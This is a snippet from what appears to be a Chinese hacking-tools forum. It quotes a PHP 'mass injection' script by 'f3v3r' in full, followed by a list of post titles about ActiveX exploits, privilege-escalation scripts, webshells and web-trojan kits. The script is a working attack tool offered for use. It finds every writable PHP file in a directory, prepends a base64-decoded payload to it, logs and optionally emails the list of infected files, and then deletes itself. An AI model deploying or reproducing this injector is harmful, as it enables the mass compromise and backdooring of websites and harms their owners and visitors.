|
| 以下是引用片段: <?php set_time_limit(0); ignore_user_abort(1); # PHP Mass Injection Script by f3v3r ver.228 # |1| Look for PHP in directory.|2| Check injected. # |3| Inject script. |4|Can email report to you. $inj =''; $log_email = 0;//change 1 enable, somehow they can trace you by this way. $email = 'f3v3r@cc.cc'; $log_report = 1; $filename = '__log.html'; $delete_me = 1; echo '<title>f3v3r injection toolz</title><center><strong>Defacez aint hack, r00tz r.</strong></center><br>'; $dir = opendir('.'); $site=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); while ($file = readdir($dir)) { if (strstr($file, '.php') && is_writeable($file)) { $victim = fopen($file, 'r+'); $victim_read = fread($victim, filesize($file)); if (!strstr($victim_read, 'f3v3r')) { fclose($victim); unlink($file); $new = fopen($file, 'a+'); $new_write = fwrite($new, base64_decode($inj) . $victim_read); fclose($new); echo '<strong>[-] injecting : ' . $site . '</strong><br>'; echo '[x] injected: ' . $file . '<br>'; if($log_email) { $log = fopen('__tmp', 'a+'); fwrite($log, '[x] File: ' . getcwd() . $file . '<br>'); fclose($log); } if($log_report) { $x = fopen($filename, 'a+'); fwrite($x, '[x] File: ' . getcwd() . $file . '\n'); fclose($x); } } } } closedir($dir); if($log_email) { $report = file_get_contents('__tmp'); mail($email, "injection report", '<br>f3v3r<br> ' .$report, 'From: f3v3r <f3v3r@cc.cc>'); unlink('__tmp'); echo '[x] Email Report Sent!';} if($delete_me) { unlink(__file__); } exit; ?> |
| Real Player rmoc3260.dll Activ | 04-04 |
| Real Player rmoc3260.dll Activ | 04-03 |
| Pangolin号称很牛的注入工具 | 03-25 |
| 仿FirePack网马管理系统fsploit | 03-01 |
| 机器狗生成器 | 02-26 |
| Serv-U 6.X 提权脚本 | 01-31 |
| 入侵工具Knark的分析及防范 | 01-14 |
| 如何使用Nikto漏洞扫描工具检测网 | 12-21 |
| 十三WEBSHELL终结版后门的去除过 | 12-14 |
| hijack(红狼安全小组原创作品 - | 11-29 |
| 高级内网渗透工具:Paris (创建VP | 11-01 |
| AntiARP-DNS Ver:3.6.4 绿色美化 | 10-15 |